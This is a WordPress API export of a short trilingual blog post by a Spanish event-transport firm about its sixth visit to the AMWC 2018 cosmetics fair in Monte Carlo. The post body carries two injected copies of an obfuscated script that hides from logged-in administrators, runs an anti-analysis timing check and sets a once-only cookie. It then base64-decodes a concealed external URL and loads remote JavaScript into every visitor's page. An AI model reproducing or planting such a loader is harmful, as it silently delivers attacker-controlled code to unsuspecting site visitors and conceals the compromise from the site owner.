{"id":1295,"date":"2018-04-12T14:10:33","date_gmt":"2018-04-12T12:10:33","guid":{"rendered":"http:\/\/www.weservices.es\/?p=1295"},"modified":"2026-04-27T10:16:01","modified_gmt":"2026-04-27T10:16:01","slug":"amwc-2018-monaco-consolidacion","status":"publish","type":"post","link":"https:\/\/weservices.es\/en\/amwc-2018-monaco-consolidacion\/","title":{"rendered":"[:es]AMWC 2018 &#8211; MONACO: CONSOLIDACI\u00d3N[:en]AMWC 2018 &#8211; MONACO: CONSOLIDATION[:ca]AMWC 2018 &#8211; MONACO: CONSOLIDACI\u00d3[:]"},"content":{"rendered":"<p>[:es]Sexta edici\u00f3n en la que acompa\u00f1amos a nuestros clientes a uno de los eventos m\u00e1s importantes de la cosm\u00e9tica mundial, nos consolidamos en la fant\u00e1stica ciudad de Monte Carlo.[:en]<span id=\"result_box\" class=\"\" lang=\"en\"><span class=\"\">Sixth edition walking with our customers to one of the most important events in cosmetics sector worldwide, WE Services consolidates in the fantastic city of Monte Carlo.<\/span><\/span>[:ca]<span id=\"result_box\" class=\"\" lang=\"ca\">Sisena edici\u00f3 en qu\u00e8 acompanyem als nostres clients a un dels esdeveniments m\u00e9s importants de la cosm\u00e8tica mundial, ens consolidem a la fant\u00e0stica ciutat <span class=\"\">de Montecarlo<\/span><span class=\"\">.<\/span><\/span>[:]<script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><\/p>","protected":false},"excerpt":{"rendered":"<p>[:es]Sexta edici\u00f3n en la que acompa\u00f1amos a nuestros clientes a uno de los eventos m\u00e1s importantes de la cosm\u00e9tica mundial, nos consolidamos en la fant\u00e1stica ciudad de Monte Carlo.[:en]Sixth edition walking with our customers to one of the most important events in cosmetics sector worldwide, WE Services consolidates in the fantastic city of Monte Carlo.[:ca]Sisena [&hellip;]<\/p>","protected":false},"author":2,"featured_media":1299,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[5],"tags":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v22.3 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>[:es]AMWC 2018 - MONACO: CONSOLIDACI\u00d3N[:en]AMWC 2018 - MONACO: CONSOLIDATION[:ca]AMWC 2018 - MONACO: CONSOLIDACI\u00d3[:] - We Services<\/title>\n<meta name=\"description\" content=\"Sexta edici\u00f3n en la que acompa\u00f1amos a nuestros clientes a uno de los eventos m\u00e1s importantes de la cosm\u00e9tica mundial, nos consolidamos en la fant\u00e1stica\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/weservices.es\/en\/amwc-2018-monaco-consolidacion\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"[:es]AMWC 2018 - MONACO: CONSOLIDACI\u00d3N[:en]AMWC 2018 - MONACO: CONSOLIDATION[:ca]AMWC 2018 - MONACO: CONSOLIDACI\u00d3[:] - We Services\" \/>\n<meta property=\"og:description\" content=\"Sexta edici\u00f3n en la que acompa\u00f1amos a nuestros clientes a uno de los eventos m\u00e1s importantes de la cosm\u00e9tica mundial, nos consolidamos en la fant\u00e1stica\" \/>\n<meta property=\"og:url\" content=\"https:\/\/weservices.es\/en\/amwc-2018-monaco-consolidacion\/\" \/>\n<meta property=\"og:site_name\" content=\"We Services\" \/>\n<meta property=\"article:published_time\" content=\"2018-04-12T12:10:33+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2026-04-27T10:16:01+00:00\" \/>\n<meta name=\"author\" content=\"JOSE ANTONIO GARCIA SANCHEZ\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"JOSE ANTONIO GARCIA SANCHEZ\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/weservices.es\/amwc-2018-monaco-consolidacion\/\",\"url\":\"https:\/\/weservices.es\/amwc-2018-monaco-consolidacion\/\",\"name\":\"[:es]AMWC 2018 - MONACO: CONSOLIDACI\u00d3N[:en]AMWC 2018 - MONACO: CONSOLIDATION[:ca]AMWC 2018 - MONACO: CONSOLIDACI\u00d3[:] - We Services\",\"isPartOf\":{\"@id\":\"https:\/\/weservices.es\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/weservices.es\/amwc-2018-monaco-consolidacion\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/weservices.es\/amwc-2018-monaco-consolidacion\/#primaryimage\"},\"thumbnailUrl\":\"\",\"datePublished\":\"2018-04-12T12:10:33+00:00\",\"dateModified\":\"2026-04-27T10:16:01+00:00\",\"author\":{\"@id\":\"https:\/\/weservices.es\/#\/schema\/person\/af068a5b48ce3b53d759cef6930c673b\"},\"description\":\"Sexta edici\u00f3n en la que acompa\u00f1amos a nuestros clientes a uno de los eventos m\u00e1s importantes de la cosm\u00e9tica mundial, nos consolidamos en la fant\u00e1stica\",\"breadcrumb\":{\"@id\":\"https:\/\/weservices.es\/amwc-2018-monaco-consolidacion\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/weservices.es\/amwc-2018-monaco-consolidacion\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/weservices.es\/amwc-2018-monaco-consolidacion\/#primaryimage\",\"url\":\"\",\"contentUrl\":\"\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/weservices.es\/amwc-2018-monaco-consolidacion\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Portada\",\"item\":\"https:\/\/weservices.es\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"[:es]AMWC 2018 &#8211; MONACO: CONSOLIDACI\u00d3N[:en]AMWC 2018 &#8211; MONACO: CONSOLIDATION[:ca]AMWC 2018 &#8211; MONACO: CONSOLIDACI\u00d3[:]\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/weservices.es\/#website\",\"url\":\"https:\/\/weservices.es\/\",\"name\":\"We Services\",\"description\":\"Transport for fairs and events\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/weservices.es\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"en-US\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/weservices.es\/#\/schema\/person\/af068a5b48ce3b53d759cef6930c673b\",\"name\":\"JOSE ANTONIO GARCIA SANCHEZ\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/weservices.es\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/caf6e28e6b0db890830baec9989dbcd3?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/caf6e28e6b0db890830baec9989dbcd3?s=96&d=mm&r=g\",\"caption\":\"JOSE ANTONIO GARCIA SANCHEZ\"},\"url\":\"https:\/\/weservices.es\/en\/author\/jo\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"[:es]AMWC 2018 - MONACO: CONSOLIDACI\u00d3N[:en]AMWC 2018 - MONACO: CONSOLIDATION[:ca]AMWC 2018 - MONACO: CONSOLIDACI\u00d3[:] - We Services","description":"Sexta edici\u00f3n en la que acompa\u00f1amos a nuestros clientes a uno de los eventos m\u00e1s importantes de la cosm\u00e9tica mundial, nos consolidamos en la fant\u00e1stica","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/weservices.es\/en\/amwc-2018-monaco-consolidacion\/","og_locale":"en_US","og_type":"article","og_title":"[:es]AMWC 2018 - MONACO: CONSOLIDACI\u00d3N[:en]AMWC 2018 - MONACO: CONSOLIDATION[:ca]AMWC 2018 - MONACO: CONSOLIDACI\u00d3[:] - We Services","og_description":"Sexta edici\u00f3n en la que acompa\u00f1amos a nuestros clientes a uno de los eventos m\u00e1s importantes de la cosm\u00e9tica mundial, nos consolidamos en la fant\u00e1stica","og_url":"https:\/\/weservices.es\/en\/amwc-2018-monaco-consolidacion\/","og_site_name":"We Services","article_published_time":"2018-04-12T12:10:33+00:00","article_modified_time":"2026-04-27T10:16:01+00:00","author":"JOSE ANTONIO GARCIA SANCHEZ","twitter_card":"summary_large_image","twitter_misc":{"Written by":"JOSE ANTONIO GARCIA SANCHEZ"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/weservices.es\/amwc-2018-monaco-consolidacion\/","url":"https:\/\/weservices.es\/amwc-2018-monaco-consolidacion\/","name":"[:es]AMWC 2018 - MONACO: CONSOLIDACI\u00d3N[:en]AMWC 2018 - MONACO: CONSOLIDATION[:ca]AMWC 2018 - MONACO: CONSOLIDACI\u00d3[:] - We Services","isPartOf":{"@id":"https:\/\/weservices.es\/#website"},"primaryImageOfPage":{"@id":"https:\/\/weservices.es\/amwc-2018-monaco-consolidacion\/#primaryimage"},"image":{"@id":"https:\/\/weservices.es\/amwc-2018-monaco-consolidacion\/#primaryimage"},"thumbnailUrl":"","datePublished":"2018-04-12T12:10:33+00:00","dateModified":"2026-04-27T10:16:01+00:00","author":{"@id":"https:\/\/weservices.es\/#\/schema\/person\/af068a5b48ce3b53d759cef6930c673b"},"description":"Sexta edici\u00f3n en la que acompa\u00f1amos a nuestros clientes a uno de los eventos m\u00e1s importantes de la cosm\u00e9tica mundial, nos consolidamos en la fant\u00e1stica","breadcrumb":{"@id":"https:\/\/weservices.es\/amwc-2018-monaco-consolidacion\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/weservices.es\/amwc-2018-monaco-consolidacion\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/weservices.es\/amwc-2018-monaco-consolidacion\/#primaryimage","url":"","contentUrl":""},{"@type":"BreadcrumbList","@id":"https:\/\/weservices.es\/amwc-2018-monaco-consolidacion\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Portada","item":"https:\/\/weservices.es\/"},{"@type":"ListItem","position":2,"name":"[:es]AMWC 2018 &#8211; MONACO: CONSOLIDACI\u00d3N[:en]AMWC 2018 &#8211; MONACO: CONSOLIDATION[:ca]AMWC 2018 &#8211; MONACO: CONSOLIDACI\u00d3[:]"}]},{"@type":"WebSite","@id":"https:\/\/weservices.es\/#website","url":"https:\/\/weservices.es\/","name":"We Services","description":"Transport for fairs and events","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/weservices.es\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"en-US"},{"@type":"Person","@id":"https:\/\/weservices.es\/#\/schema\/person\/af068a5b48ce3b53d759cef6930c673b","name":"JOSE ANTONIO GARCIA SANCHEZ","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/weservices.es\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/caf6e28e6b0db890830baec9989dbcd3?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/caf6e28e6b0db890830baec9989dbcd3?s=96&d=mm&r=g","caption":"JOSE ANTONIO GARCIA SANCHEZ"},"url":"https:\/\/weservices.es\/en\/author\/jo\/"}]}},"_links":{"self":[{"href":"https:\/\/weservices.es\/en\/wp-json\/wp\/v2\/posts\/1295"}],"collection":[{"href":"https:\/\/weservices.es\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/weservices.es\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/weservices.es\/en\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/weservices.es\/en\/wp-json\/wp\/v2\/comments?post=1295"}],"version-history":[{"count":2,"href":"https:\/\/weservices.es\/en\/wp-json\/wp\/v2\/posts\/1295\/revisions"}],"predecessor-version":[{"id":3155,"href":"https:\/\/weservices.es\/en\/wp-json\/wp\/v2\/posts\/1295\/revisions\/3155"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/weservices.es\/en\/wp-json\/"}],"wp:attachment":[{"href":"https:\/\/weservices.es\/en\/wp-json\/wp\/v2\/media?parent=1295"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/weservices.es\/en\/wp-json\/wp\/v2\/categories?post=1295"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/weservices.es\/en\/wp-json\/wp\/v2\/tags?post=1295"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}